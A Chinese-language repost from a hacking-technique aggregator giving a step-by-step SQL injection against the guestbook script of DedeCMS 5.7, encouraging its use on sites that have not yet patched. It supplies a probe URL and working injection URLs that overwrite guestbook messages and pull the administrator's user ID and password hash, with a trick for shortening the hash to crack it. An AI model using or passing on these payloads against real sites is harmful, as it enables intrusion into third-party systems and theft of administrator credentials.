记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

dede5.7 The guestbook AND SQL injection

2013-01-08 01:10

大概就是没多久的漏洞。

想必有的站还没补上。

在渗透中,不妨试试!

漏洞成功需要条件:

1. php magic_quotes_gpc=off

2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

判断是否存在漏洞:

先打开www.ashker.net/plus/guestbook.php 可以看到别人的留言,

然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID

接着访问:

www.ashker.net/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID

提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了

跳回到www.ashker.net/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证。

明漏洞无法利用。

是开启了 php magic_quotes_gpc=off

如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。

那么再次访问

www.ashker.net/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

然后返回,那条留言ID的内容就直接修改成了mysql 的user().

接着开始爆密码:

www.ashker.net/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='得到20 MD5密码,方法是,前减3后减1,得到16位MD5
知识来源: www.ashker.net/index.php/archives/617

阅读:470315 | 评论:5 | 标签:Article PHP

想收藏或者和大家分享这篇好文章→复制链接地址

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云